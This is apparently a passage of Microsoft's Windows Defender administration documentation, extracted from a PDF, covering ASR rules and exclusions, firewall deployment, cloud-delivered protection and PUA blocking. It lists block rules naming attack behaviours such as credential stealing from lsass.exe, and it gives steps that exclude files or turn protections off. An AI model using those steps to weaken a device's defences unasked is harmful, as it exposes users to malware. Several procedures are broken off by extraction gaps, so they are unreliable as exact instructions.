Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions

AuditMode
To turn off ASR rules, use the following cmdlet:
Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions

Disabled
IMPORTANT
You must specify the state individually for each rule, but you can combine rules and states in a comma-separated
list.
In the following example, the first two rules will be enabled, the third rule will be disabled, and the fourth rule will be
enabled in audit mode:
Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID 1>,<rule ID 2>,<rule ID 3>,<rule ID 4>

-AttackSurfaceReductionRules_Actions Enabled, Enabled, Disabled, AuditMode
You can also the Add-MpPreference PowerShell verb to add new rules to the existing list.
WARNING
Set-MpPreference will always overwrite the existing set of rules. If you want to add to the existing set, you should
use Add-MpPreference instead. You can obtain a list of rules and their current state by using Get-MpPreference
3. To exclude files and folders from ASR rules, use the following cmdlet:
Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"
Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add more files and folders to

the list.
IMPORTANT
Use Add-MpPreference to append or add apps to the list. Using the Set-MpPreference cmdlet will overwrite the
existing list.
Related topics
Customize attack surface reduction rules
Applies to:
Attack surface reduction rules help prevent actions and apps that are typically used by exploit-seeking malware to
infect machines. Attack surface reduction rules are supported on Windows Server 2019 as well as Windows 10
clients.
This topic describes how to customize attack surface reduction rules by excluding files and folders or adding
custom text to the notification alert that appears on a user's computer.
You can use Group Policy, PowerShell, and MDM CSPs to configure these settings.
Exclude files and folders

You can exclude files and folders from being evaluated by all attack surface reduction rules. This means that even if
the file or folder contains malicious behavior as determined by an attack surface reduction rule, the file will not be
blocked from running.
This could potentially allow unsafe files to run and infect your devices.
WARNING
Excluding files or folders can severely reduce the protection provided by attack surface reduction rules. Files that would have
been blocked by a rule will be allowed to run, and there will be no report or event recorded.
If you are encountering problems with rules detecting files that you believe should not be detected, you should use audit
mode first to test the rule.
You can specify individual files or folders (using folder paths or fully qualified resource names) but you cannot
specify if the exclusions should only be applied to individual rules: the exclusions will apply to all rules that are
enabled (or placed in audit mode) and that allow exclusions.
Attack surface reduction supports environment variables and wildcards. For information about using wildcards, see
Use wildcards in the file name and folder path or extension exclusion lists.
Exclusions apply to all attack surface reduction rules.
RULE DESCRIPTION GUID
Block all Office applications from creating child processes D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block execution of potentially obfuscated scripts 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 API calls from Office macro 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
Block Office applications from creating executable content 3B576869-A4EC-4529-8536-B80A7769E899

RULE DESCRIPTION GUID
Block Office applications from injecting code into other 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84

processes
Block JavaScript or VBScript from launching downloaded D3E037E1-3EB8-44C8-A917-57927947596D

executable content
Block executable content from email client and webmail BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block executable files from running unless they meet a 01443614-cd74-433a-b99e-2ecdc07bfc25

prevalence, age, or trusted list criteria
Use advanced protection against ransomware c1db55ab-c21a-4637-bb3f-a12568109d35
Block credential stealing from the Windows local security 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2

authority subsystem (lsass.exe)
Block process creations originating from PSExec and WMI d1e49aac-8f56-4280-b9ba-993a6d77406c

commands
Block untrusted and unsigned processes that run from USB b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block Office communication applications from creating child 26190899-1602-49e8-8b27-eb1d0a1ce869

processes
Block Adobe Reader from creating child processes 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
See the attack surface reduction topic for details on each rule.
Use Group Policy to exclude files and folders
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
templates.
Exploit Guard > Attack surface reduction.
4. Double-click the Exclude files and paths from Attack surface reduction Rules setting and set the option
to Enabled. Click Show and enter each file or folder in the Value name column. Enter 0 in the Value
column for each item.
Use PowerShell to exclude files and folderss
Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"
Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add more folders to the list.

IMPORTANT
Use Add-MpPreference to append or add apps to the list. Using the Set-MpPreference cmdlet will overwrite the existing
list.
Use MDM CSPs to exclude files and folders

Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions configuration service
provider (CSP ) to add exclusions.
Customize the notification

See the Windows Security topic for more information about customizing the notification when a rule is triggered
and blocks an app or file.
Related topics
Windows Defender Firewall with Advanced Security
Deployment Guide
Applies to
Windows 10
Windows Server 2016
You can use the Windows Defender Firewall with Advanced Security MMC snap-in with devices running at least
Windows Vista or Windows Server 2008 to help protect the devices and the data that they share across a network.
You can use Windows Defender Firewall to control access to the device from the network. You can create rules that
allow or block network traffic in either direction based on your business requirements. You can also create IPsec
connection security rules to help protect your data as it travels across the network from device to device.
About this guide

This guide is intended for use by system administrators and system engineers. It provides detailed guidance for
deploying a Windows Defender Firewall with Advanced Security design that you or an infrastructure specialist or
system architect in your organization has selected.
Begin by reviewing the information in Planning to Deploy Windows Defender Firewall with Advanced Security.
If you have not yet selected a design, we recommend that you wait to follow the instructions in this guide until
after you have reviewed the design options in the Windows Defender Firewall with Advanced Security Design
Guide and selected the one most appropriate for your organization.
After you select your design and gather the required information about the zones (isolation, boundary, and
encryption), operating systems to support, and other details, you can then use this guide to deploy your Windows
Defender Firewall with Advanced Security design in your production environment. This guide provides steps for
deploying any of the following primary designs that are described in the Design Guide:
Basic Firewall Policy Design
Domain Isolation Policy Design
Server Isolation Policy Design
Certificate-based Isolation Policy Design
Use the checklists in Implementing Your Windows Defender Firewall with Advanced Security Design Plan to
determine how best to use the instructions in this guide to deploy your particular design.
Caution: We recommend that you use the techniques documented in this guide only for GPOs that must be
deployed to the majority of the devices in your organization, and only when the OU hierarchy in your Active
Directory domain does not match the deployment needs of these GPOs. These characteristics are typical of
GPOs for server and domain isolation scenarios, but are not typical of most other GPOs. When the OU
hierarchy supports it, deploy a GPO by linking it to the lowest level OU that contains all of the accounts to
which the GPO applies.
In a large enterprise environment with hundreds or thousands of GPOs, using this technique with too many GPOs
can result in user or device accounts that are members of an excessive number of groups; this can result in
network connectivity problems if network protocol limits are exceeded.
What this guide does not provide

This guide does not provide:
Guidance for creating firewall rules for specific network applications. For this information, see Planning
Settings for a Basic Firewall Policy in the Windows Defender Firewall with Advanced Security Design
Guide.
Guidance for setting up Active Directory Domain Services (AD DS ) to support Group Policy.
Guidance for setting up certification authorities (CAs) to create certificates for certificate-based
authentication.
Overview of Windows Defender Firewall with Advanced Security

Windows Defender Firewall in Windows 8, Windows 7, Windows Vista, Windows Server 2012, Windows Server
2008, and Windows Server 2008 R2 is a stateful host firewall that helps secure the device by allowing you to
create rules that determine which network traffic is permitted to enter the device from the network and which
network traffic the device is allowed to send to the network. Windows Defender Firewall also supports Internet
Protocol security (IPsec), which you can use to require authentication from any device that is attempting to
communicate with your device. When authentication is required, devices that cannot be authenticated as a trusted
device cannot communicate with your device. You can also use IPsec to require that certain network traffic is
encrypted to prevent it from being read by network packet analyzers that could be attached to the network by a
malicious user.
The Windows Defender Firewall with Advanced Security MMC snap-in is more flexible and provides much more
functionality than the consumer-friendly Windows Defender Firewall interface found in the Control Panel. Both
interfaces interact with the same underlying services, but provide different levels of control over those services.
While the Windows Defender Firewall Control Panel program can protect a single device in a home environment,
it does not provide enough centralized management or security features to help secure more complex network
traffic found in a typical business enterprise environment.
For more information about Windows Defender Firewall with Advanced Security, see Windows Defender Firewall
with Advanced Security Overview.
Configure Windows Defender Antivirus features
Applies to:
You can configure Windows Defender Antivirus with a number of tools, including:
Microsoft Intune
Group Policy
PowerShell cmdlets
The following broad categories of features can be configured:
Always-on real-time protection, including behavioral, heuristic, and machine-learning-based protection
How end-users interact with the client on individual endpoints
The topics in this section describe how to perform key tasks when configuring Windows Defender Antivirus. Each
topic includes instructions for the applicable configuration tool (or tools).
You can also review the Reference topics for management and configuration tools topic for an overview of each
tool and links to further help.
In this section
TOPIC DESCRIPTION
Utilize Microsoft cloud-provided Windows Defender Antivirus Cloud-delivered protection provides an advanced level of fast,
protection robust antivirus detection
Configure behavioral, heuristic, and real-time protection Enable behavior-based, heuristic, and real-time antivirus
protection
Configure end-user interaction with Windows Defender Configure how end-users interact with Windows Defender
Antivirus Antivirus, what notifications they see, and whether they can
override settings
Use next-gen technologies in Windows Defender
Antivirus through cloud-delivered protection
Applies to:
Microsoft next-gen technologies in Windows Defender Antivirus provide near-instant, automated protection
against new and emerging threats. To dynamically identify new threats, these technologies work with large sets of
interconnected data in the Microsoft Intelligent Security Graph and powerful artificial intelligence (AI) systems
driven by advanced machine learning models.
To take advantage of the power and speed of these next-gen technologies, Windows Defender Antivirus works
seamlessly with Microsoft cloud services. These cloud protection services, also referred to as Microsoft Advanced
Protection Service (MAPS ), enhances standard real-time protection, providing arguably the best antivirus
defense.
NOTE
The Windows Defender Antivirus cloud service is a mechanism for delivering updated protection to your network and
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud, rather it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than
traditional Security intelligence updates.
With cloud-delivered protection, next-gen technologies provide rapid identification of new threats, sometimes
even before a single machine is infected. Watch the following video about Microsoft AI and Windows Defender
Antivirus in action:
https://www.microsoft.com/en-us/videoplayer/embed/RE1Yu4B
To understand how next-gen technologies shorten protection delivery time through the cloud, watch the
following video:
https://videoplayercdn.osi.office.net/embed/c2f20f59-ca56-4a7b-ba23-44c60bc62c59
Read the following blog posts for detailed protection stories involving cloud-protection and Microsoft AI:
Why Windows Defender Antivirus is the most deployed in the enterprise
Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign
How artificial intelligence stopped an Emotet outbreak
Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses
Windows Defender Antivirus cloud protection service: Advanced real-time defense against never-before-seen
malware
Get cloud-delivered protection

Cloud-delivered protection is enabled by default. However, you may need to re-enable it if it has been disabled as
part of previous organizational policies.
Organizations running Windows 10 E5, version 1803 can also take advantage of emergency dynamic intelligence
updates, which provide near real-time protection from emerging threats. When you turn cloud-delivered
protection on, we can deliver a fix for a malware issue via the cloud within minutes instead of waiting for the next
update.
TIP
The following table describes the differences in cloud-delivered protection between recent versions of Windows
and System Center Configuration Manager.
SYSTEM
SYSTEM CENTER
WINDOWS 10, WINDOWS 10, CENTER CONFIGURATI
WINDOWS 8.1 VERSION 1607 VERSION 1703 CONFIGURATI ON MANAGER
(GROUP (GROUP (GROUP ON MANAGER (CURRENT MICROSOFT
FEATURE POLICY) POLICY) POLICY) 2012 BRANCH) INTUNE
Cloud- Microsoft Microsoft Cloud-based NA Cloud Microsoft

protection Advanced Advanced Protection protection Advanced
service label Protection Protection service Protection
Service Service Service
Reporting Basic, Advanced Advanced Dependent on Dependent on Dependent on

level (MAPS Advanced Windows Windows Windows
membership version version version
level)
Cloud block No No Configurable Not Configurable Configurable

timeout configurable
period
You can also configure Windows Defender AV to automatically receive new protection updates based on reports
from our cloud service.
In this section
TOPIC DESCRIPTION
Enable cloud-delivered protection You can enable cloud-delivered protection with System
Center Configuration Manager, Group Policy, Microsoft
Intune, and PowerShell cmdlets.
Specify the cloud-delivered protection level You can specify the level of protection offered by the cloud
with Group Policy and System Center Configuration Manager.
The protection level will affect the amount of information
shared with the cloud and how aggressively new files are
blocked.
Configure and validate network connections for Windows There are certain Microsoft URLs that your network and
Defender Antivirus endpoints must be able to connect to for cloud-delivered
protection to work effectively. This topic lists the URLs that
should be allowed via firewall or network filtering rules, and
instructions for confirming your network is properly enrolled
in cloud-delivered protection.
TOPIC DESCRIPTION
Configure the block at first sight feature The Block at First Sight feature can block new malware within
seconds, without having to wait hours for traditional Security
intelligence . You can enable and configure it with System
Center Configuration Manager and Group Policy.
Configure the cloud block timeout period Windows Defender Antivirus can block suspicious files from
running while it queries our cloud-delivered protection
service. You can configure the amount of time the file will be
prevented from running with System Center Configuration
Manager and Group Policy.
Applies to:
NOTE
endpoints. Although it is called a cloud service, it is not simply protection for files stored in the cloud; rather, it uses
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than
traditional Security intelligence updates.
You can enable or disable Windows Defender Antivirus cloud-delivered protection with Microsoft Intune, System
Center Configuration Manager, Group Policy, PowerShell cmdlets, or on individual clients in the Windows
Security app.
See Use Microsoft cloud-delivered protection for an overview of Windows Defender Antivirus cloud-delivered
protection.
There are specific network-connectivity requirements to ensure your endpoints can connect to the cloud-
delivered protection service. See Configure and validate network connections for more details.
NOTE
In Windows 10, there is no difference between the Basic and Advanced options described in this topic. This is a legacy
distinction and choosing either setting will result in the same level of cloud-delivered protection. There is no difference in
the type or amount of information that is shared. See the Microsoft Privacy Statement for more information on what we
collect.
Use Intune to enable cloud-delivered protection

1. Sign in to the Azure portal.
2. Select All services > Intune.
3. In the Intune pane, select Device configuration > Profiles, and then select the Device restrictions profile
type you want to configure. If you haven't yet created a Device restrictions profile type, or if you want to
create a new one, see Configure device restriction settings in Microsoft Intune.
4. Select Properties, select Settings: Configure, and then select Windows Defender Antivirus.
5. On the Cloud-delivered protection switch, select Enable.
6. In the Prompt users before sample submission dropdown, select Send all data without prompting.
7. In the Submit samples consent dropdown, select one of the following:
Send safe samples automatically
Send all samples automatically
NOTE
Send safe samples automatically option means that most samples will be sent automatically. Files that
are likely to contain personal information will still prompt and require additional confirmation.
WARNING
Setting to Always Prompt will lower the protection state of the device. Setting to Never send means the
Block at First Sight feature will not function.
8. Click OK to exit the Windows Defender Antivirus settings pane, click OK to exit the Device
restrictions pane, and then click Save to save the changes to your Device restrictions profile.
For more information about Intune device profiles, including how to create and configure their settings, see
What are Microsoft Intune device profiles?
Use Configuration Manager to enable cloud-delivered protection:
See How to create and deploy antimalware policies: Cloud-protection service for details on configuring System
Center Configuration Manager (current branch).
Use Group Policy to enable cloud-delivered protection:
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus > MAPS
5. Double-click Join Microsoft MAPS and ensure the option is enabled and set to Basic MAPS or
Advanced MAPS. Click OK.
6. Double-click Send file samples when further analysis is required and ensure the option is set to
Enabled and the additional options are either of the following:
a. Send safe samples (1)
b. Send all samples (3)
NOTE
Send safe samples automatically option means that most samples will be sent automatically. Files that
are likely to contain personal information will still prompt and require additional confirmation.
WARNING
Setting to 0 (Always Prompt) will lower the protection state of the device. Setting to 2 (Never send) means
the Block at First Sight feature will not function.
7. Click OK.
Use PowerShell cmdlets to enable cloud-delivered protection:
Use the following cmdlets to enable cloud-delivered protection:
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent Always
NOTE
You can also set -SubmitSamplesConsent to None . Setting it to Never will lower the protection state of the device, and
setting it to 2 means the Block at First Sight feature will not function.
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instruction (WMI ) to enable cloud-delivered protection:
Use the Set method of the MSFT_MpPreference class for the following properties:
MAPSReporting
SubmitSamplesConsent
See the following for more information and allowed parameters:

Windows Defender WMIv2 APIs
Enable cloud-delivered protection on individual clients with the Windows Security app
NOTE
If the Configure local setting override for reporting Microsoft MAPS Group Policy setting is set to Disabled, then
the Cloud-based protection setting in Windows Settings will be greyed-out and unavailable. Changes made through a
Group Policy Object must first be deployed to individual endpoints before the setting will be updated in Windows Settings.
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Virus &
threat protection settings label:
3. Confirm that Cloud-based Protection and Automatic sample submission are switched to On.
NOTE
If automatic sample submission has been configured with Group Policy then the setting will be greyed-out and unavailable.
Related topics
Configure block at first sight
Use PowerShell cmdlets to manage Windows Defender Antivirus
Help secure Windows PCs with Endpoint Protection for Microsoft Intune]
Defender cmdlets
Utilize Microsoft cloud-delivered protection in Windows Defender Antivirus
How to create and deploy antimalware policies: Cloud-protection service
Specify the cloud-delivered protection level
Applies to:
You can specify the level of cloud-protection offered by Windows Defender Antivirus with Group Policy and
System Center Configuration Manager.
NOTE
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than traditional
Security intelligence updates.
Use Intune to specify the level of cloud-delivered protection:

2. Select All services > Intune.
3. In the Intune pane, select Device configuration > Profiles, and then select the Device restrictions profile
type you want to configure. If you haven't yet created a Device restrictions profile type, or if you want to
create a new one, see Configure device restriction settings in Microsoft Intune.
4. Select Properties, select Settings: Configure, and then select Windows Defender Antivirus.
5. On the File Blocking Level switch, select one of the following:
a. High to provide a strong level of detection
b. High + to apply additional protection measures
c. Zero tolerance to block all unknown executables
WARNING
While unlikely, setting this switch to High might cause some legitimate files to be detected. The High +
setting might impact client performance. We recommend you set this to the default level (Not configured).
6. Click OK to exit the Windows Defender Antivirus settings pane, click OK to exit the Device restrictions
pane, and then click Save to save the changes to your Device restrictions profile.
For more information about Intune device profiles, including how to create and configure their settings, see What
are Microsoft Intune device profiles?
Use Configuration Manager to specify the level of cloud-delivered protection:
1. See How to create and deploy antimalware policies: Cloud-protection service for details on configuring System
Use Group Policy to specify the level of cloud-delivered protection:
4. Expand the tree to Windows components > Windows Defender Antivirus > MpEngine.
5. Double-click the Select cloud protection level setting and set it to Enabled. Select the level of
protection:
a. Setting to Default Windows Defender Antivirus blocking level provides strong detection without
increasing the risk of detecting legitimate files.
b. Setting to High blocking level applies a strong level of detection.
c. High + blocking level applies additional protection measures.
d. Zero tolerance blocking level blocks all unknown executables.
WARNING
While unlikely, setting this switch to High might cause some legitimate files to be detected (although you will
have the option to unblock or dispute that detection). The High + setting might impact client performance.
We recommend you set this to the default level (Not configured).
6. Click OK.
Related topics
How to create and deploy antimalware policies: Cloud-protection service
Configure and validate Windows Defender Antivirus
network connections
Applies to:
To ensure Windows Defender Antivirus cloud-delivered protection works properly, you need to configure your
network to allow connections between your endpoints and certain Microsoft servers.
This topic lists the connections that must be allowed, such as by using firewall rules, and provides instructions for
validating your connection. This will help ensure you receive the best protection from our cloud-delivered
protection services.
See the Enterprise Mobility and Security blog post Important changes to Microsoft Active Protection Services
endpoint for some details about network connectivity.
TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features are
working:
Fast learning (including block at first sight)
Allow connections to the Windows Defender Antivirus cloud service

The Windows Defender Antivirus cloud service provides fast, strong protection for your endpoints. Enabling the
cloud-delivered protection service is optional, however it is highly recommended because it provides very
important protection against malware on your endpoints and across your network.
NOTE
distributed resources and machine learning to deliver protection to your endpoints at a rate that is far faster than traditional
Security intelligence updates.
See Enable cloud-delivered protection for details on enabling the service with Intune, System Center
Configuration Manager, Group Policy, PowerShell cmdlets, or on individual clients in the Windows Security app.
After you've enabled the service, you may need to configure your network or firewall to allow connections
between it and your endpoints.
The following table lists the services and their associated URLs that your network must be able to connect to. You
should ensure there are no firewall or network filtering rules that would deny access to these URLs, or you may
need to create an allow rule specifically for them:
SERVICE DESCRIPTION URL
Windows Defender Antivirus cloud- Used by Windows Defender Antivirus *.wdcp.microsoft.com

delivered protection service, also to provide cloud-delivered protection *.wdcpalt.microsoft.com
referred to as Microsoft Active *.wd.microsoft.com
Protection Service (MAPS)
Microsoft Update Service (MU) Security intelligence and product *.update.microsoft.com

updates
Security intelligence updates alternate Alternate location for Windows *.download.microsoft.com

download location (ADL) Defender Antivirus Security intelligence
updates if the installed Security
intelligence falls out of date (7 or more
days behind)
Malware submission storage Upload location for files submitted to *.blob.core.windows.net

Microsoft via the Submission form or
automatic sample submission
Certificate Revocation List (CRL) Used by Windows when creating the http://www.microsoft.com/pkiops/crl/
SSL connection to MAPS for updating http://www.microsoft.com/pkiops/certs
the CRL http://crl.microsoft.com/pki/crl/products
http://www.microsoft.com/pki/certs
Symbol Store Used by Windows Defender Antivirus https://msdl.microsoft.com/download/s

to restore certain critical files during ymbols
remediation flows
Universal Telemetry Client Used by Windows to send client This update uses SSL (TCP Port 443) to
diagnostic data; Windows Defender download manifests and upload
Antivirus uses this for product quality diagnostic data to Microsoft that uses
monitoring purposes the following DNS endpoints:
vortex-win.data.microsoft.com
settings-win.data.microsoft.com
Validate connections between your network and the cloud

After whitelisting the URLs listed above, you can test if you are connected to the Windows Defender Antivirus
cloud service and are correctly reporting and receiving information to ensure you are fully protected.
Use the cmdline tool to validate cloud-delivered protection:
Use the following argument with the Windows Defender Antivirus command line utility (mpcmdrun.exe) to verify
that your network can communicate with the Windows Defender Antivirus cloud service:
MpCmdRun -ValidateMapsConnection
NOTE
You need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click Run
as administrator and click Yes at the permissions prompt. This command will only work on Windows 10, version 1703 or
higher.
See Manage Windows Defender Antivirus with the mpcmdrun.exe commandline tool for more information on
how to use the mpcmdrun.exe utility.
Attempt to download a fake malware file from Microsoft:
You can download a sample file that Windows Defender Antivirus will detect and block if you are properly
connected to the cloud.
Download the file by visiting the following link:
http://aka.ms/ioavtest
NOTE
This file is not an actual piece of malware. It is a fake file that is designed to test if you are properly connected to the cloud.
If you are properly connected, you will see a warning Windows Defender Antivirus notification:
If you are using Microsoft Edge, you'll also see a notification message:
A similar message occurs if you are using Internet Explorer:
You will also see a detection under Quarantined threats in the Scan history section in the Windows Security
app:
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan
history label:
3. Under the Quarantined threats section, click the See full history label to see the detected fake malware:
NOTE
Versions of Windows 10 before version 1703 have a different user interface. See Windows Defender Antivirus in the
Windows Security app for more information about the differences between versions, and instructions on how to perform
common tasks in the different interfaces.
The Windows event log will also show Windows Defender client event ID 2050.
IMPORTANT
You will not be able to use a proxy auto-config (.pac) file to test network connections to these URLs. You will need to verify
your proxy servers and any network filtering tools manually to ensure connectivity.
Related topics
Run an Windows Defender Antivirus scan from the command line and Command line arguments
Important changes to Microsoft Active Protection Services endpoint
Enable block at first sight
Applies to:
Block at first sight is a feature of next gen protection that provides a way to detect and block new malware within
seconds.
It is enabled by default when certain pre-requisite settings are also enabled. In most cases, these pre-requisite
settings are also enabled by default, so the feature is running without any intervention.
You can specify how long the file should be prevented from running while the cloud-based protection service
analyzes the file.
You can also customize the message displayed on users' desktops when a file is blocked. You can change the
company name, contact information, and message URL.
TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the features are working
and see how they work.
How it works
When Windows Defender Antivirus encounters a suspicious but undetected file, it queries our cloud protection
backend. The cloud backend applies heuristics, machine learning, and automated analysis of the file to determine
whether the files are malicious or clean.
In Windows 10, version 1803, block at first sight can now block non-portable executable files (such as JS, VBS,
or macros) as well as executable files.
Block at first sight only uses the cloud protection backend for executable files and non-portable executable files
that are downloaded from the Internet, or that originate from the Internet zone. A hash value of the .exe file is
checked via the cloud backend to determine if this is a previously undetected file.
If the cloud backend is unable to make a determination, Windows Defender Antivirus locks the file and uploads a
copy to the cloud. The cloud performs additional analysis to reach a determination before it either allows the file
to run or blocks it in all future encounters, depending on whether it determines the file to be malicious or safe.
In many cases, this process can reduce the response time for new malware from hours to seconds.
Confirm and validate that block at first sight is enabled

Block at first sight requires a number of settings to be configured correctly or it will not work. These settings are
enabled by default in most enterprise Windows Defender Antivirus deployments.
Confirm block at first sight is enabled with Intune
1. In Intune, navigate to Device configuration - Profiles > Profile name > Device restrictions > Windows
Defender Antivirus.
NOTE
The profile you select must be a Device Restriction profile type, not an Endpoint Protection profile type.
1. Verify these settings are configured as follows:

Cloud-delivered protection: Enable
File Blocking Level: High
Time extension for file scanning by the cloud: 50
Prompt users before sample submission: Send all data without prompting
For more information about configuring Windows Defender Antivirus device restrictions in Intune, see
Configure device restriction settings in Microsoft Intune.
For a list of Windows Defender Antivirus device restrictions in Intune, see Device restriction for Windows 10
(and newer) settings in Intune.
Enable block at first sight with SCCM
AntiMalware Policies.
2. Click Home > Create Antimalware Policy.
3. Enter a name and a description, and add these settings:
Real time protection
Advanced
Cloud Protection Service
4. In the left column, click Real time protection, set Enable real-time protection to Yes, and set Scan
system files to Scan incoming and outgoing files.
5. Click Advanced, set Enable real-time protection to Yes, and set Scan system files to Scan incoming
and outgoing files.
6. Click Cloud Protection Service, set Cloud Protection Service membership type to Advanced
membership, set Level for blocking malicious files to High, and set Allow extended cloud check to
block and scan suspicious files for up to (seconds) to 50 seconds.
7. Click OK to create the policy.
Confirm block at first sight is enabled with Group Policy
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > MAPS and configure
the following Group Policies:
a. Double-click Join Microsoft MAPS and ensure the option is set to Enabled. Click OK.
b. Double-click Send file samples when further analysis is required and ensure the option is set
to Enabled and the additional options are either of the following:
Send safe samples (1)
Send all samples (3)
WARNING
Setting to 0 (Always Prompt) will lower the protection state of the device. Setting to 2 (Never send)
means block at first sight will not function.
c. Click OK.
4. In the Group Policy Management Editor, expand the tree to Windows components > Windows
Defender Antivirus > Real-time Protection:
a. Double-click Scan all downloaded files and attachments and ensure the option is set to
Enabled. Click OK.
b. Double-click Turn off real-time protection and ensure the option is set to Disabled. Click OK.
If you had to change any of the settings, you should re-deploy the Group Policy Object across your network to
ensure all endpoints are covered.
Confirm block at first sight is enabled with the Windows Security app
You can confirm that block at first sight is enabled in Windows Settings.
Block at first sight is automatically enabled as long as Cloud-based protection and Automatic sample
submission are both turned on.
Confirm Block at First Sight is enabled on individual clients
1. Open the Windows Security app by clicking the shield icon in the task bar.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then click Virus &
threat protection settings:
3. Confirm that Cloud-based Protection and Automatic sample submission are switched to On.
NOTE
If the pre-requisite settings are configured and deployed using Group Policy, the settings described in this section will be
greyed-out and unavailable for use on individual endpoints. Changes made through a Group Policy Object must first be
deployed to individual endpoints before the setting will be updated in Windows Settings.
Validate block at first sight is working

You can validate that the feature is working by following the steps outlined in Validate connections between your
network and the cloud.
Disable block at first sight

WARNING
Disabling block at first sight will lower the protection state of the endpoint and your network.
You may choose to disable block at first sight if you want to retain the pre-requisite settings without using block
at first sight protection. You might wish to do this if you are experiencing latency issues or you want to test the
feature's impact on your network.
Disable block at first sight with Group Policy
templates.
3. Expand the tree through Windows components > Windows Defender Antivirus > MAPS.
4. Double-click Configure the 'Block at First Sight' feature and set the option to Disabled.
NOTE
Disabling block at first sight will not disable or alter the pre-requisite group policies.
Related topics
Applies to:
When Windows Defender Antivirus finds a suspicious file, it can prevent the file from running while it queries the
Windows Defender Antivirus cloud service.
The default period that the file will be blocked is 10 seconds. You can specify an additional period of time to wait
before the file is allowed to run. This can help ensure there is enough time to receive a proper determination from
the Windows Defender Antivirus cloud service.
Prerequisites to use the extended cloud block timeout

Block at first sight and its prerequisites must be enabled before you can specify an extended timeout period.
Specify the extended timeout period

You can use Group Policy to specify an extended timeout for cloud checks.
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > MpEngine
4. Double-click Configure extended cloud check and ensure the option is enabled. Specify the additional
amount of time to prevent the file from running while waiting for a cloud determination. You can specify
the additional time, in seconds, from 1 second to 50 seconds. This time will be added to the default 10
seconds.
5. Click OK.
Related topics
Use next-gen antivirus technologies through cloud-delivered protection
Configure block at first sight
Configure behavioral, heuristic, and real-time
protection
Applies to:
Windows Defender Antivirus uses several methods to provide threat protection:
Cloud-delivered protection for near-instant detection and blocking of new and emerging threats
Always-on scanning, using file and process behavior monitoring and other heuristics (also known as "real-time
protection")
Dedicated protection updates based on machine-learning, human and automated big-data analysis, and in-
depth threat resistance research
You can configure how Windows Defender Antivirus uses these methods with Group Policy, System Center
Configuration Manage, PowerShell cmdlets, and Windows Management Instrumentation (WMI).
This section covers configuration for always-on scanning, including how to detect and block apps that are deemed
unsafe, but may not be detected as malware.
See Use next-gen Windows Defender Antivirus technologies through cloud-delivered protection for how to
enable and configure Windows Defender Antivirus cloud-delivered protection.
In this section
TOPIC DESCRIPTION
Detect and block potentially unwanted applications Detect and block apps that may be unwanted in your
network, such as adware, browser modifiers and toolbars, and
rogue or fake antivirus apps
Enable and configure Windows Defender Antivirus protection Enable and configure real-time protection, heuristics, and
capabilities other always-on Windows Defender Antivirus monitoring
features
Detect and block potentially unwanted applications
Applies to:
The potentially unwanted application (PUA) protection feature in Windows Defender Antivirus can detect and
block PUAs on endpoints in your network.
These applications are not considered viruses, malware, or other types of threats, but might perform actions on
endpoints that adversely affect their performance or use. PUA can also refer to applications that are considered to
have poor reputation.
Typical PUA behavior includes:
Various types of software bundling
Ad injection into web browsers
Driver and registry optimizers that detect issues, request payment to fix the errors, but remain on the endpoint
and make no changes or optimizations (also known as "rogue antivirus" programs)
These applications can increase the risk of your network being infected with malware, cause malware infections to
be harder to identify, and can waste IT resources in cleaning up the applications.
TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the feature is working and
see how it works.
How it works
Windows Defender Antivirus blocks detected PUA files and attempts to download, move, run, or install them.
Blocked PUA files are then moved to quarantined.
When a PUA is detected on an endpoint, Windows Defender Antivirus presents a notification to the user (unless
notifications have been disabled) in the same format as normal threat detections (prefaced with "PUA:").
They will also appear in the usual quarantine list in the Windows Security app.
View PUA events

PUA events are reported in the Windows Event Viewer, but not in System Center Configuration Manager or
Intune.
You can turn on email notifications for PUA detections.
See Troubleshoot event IDs for details on viewing Windows Defender Antivirus events. PUA events are recorded
under event ID 1160.
Configure PUA protection

You can enable PUA protection with Microsoft Intune, System Center Configuration Manager, Group Policy, or
PowerShell cmdlets.
You can also use the PUA audit mode to detect PUA without blocking them. The detections will be captured in the
Windows event log.
This feature is useful if your company is conducting an internal software security compliance check and you'd like
to avoid any false positives.
Use Intune to configure PUA protection
